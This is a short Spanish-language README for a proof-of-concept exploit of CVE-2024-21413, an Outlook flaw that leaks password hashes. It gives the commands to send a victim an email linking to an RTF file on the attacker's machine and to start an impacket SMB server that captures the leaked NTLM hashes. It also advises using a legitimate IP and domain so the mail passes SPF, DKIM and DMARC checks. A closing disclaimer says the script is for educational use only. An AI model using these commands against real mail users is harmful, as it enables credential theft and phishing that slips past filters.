
Vulnerabilidad de divulgación de información en Microsoft Outlook (fuga de hash de contraseña) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : es el archivo de prueba compartido (word en este caso) desde la máquina del atacante (xx.xx.xx.xx).
Para garantizar el cumplimiento de SPF, DKIM y DMARC, utiliza una $IP y un dominio legítimos.
Asegúrate de instalar la librería pexpect si aún no lo has hecho usando
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
[!CAUTION] ⚠️ Descargo de responsabilidad: IMPORTANTE: Este script se proporciona SOLO con fines educativos, de pruebas éticas y de uso legítimo. No lo utilices en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que sean sorprendidos realizando actividades no autorizadas estarán sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script..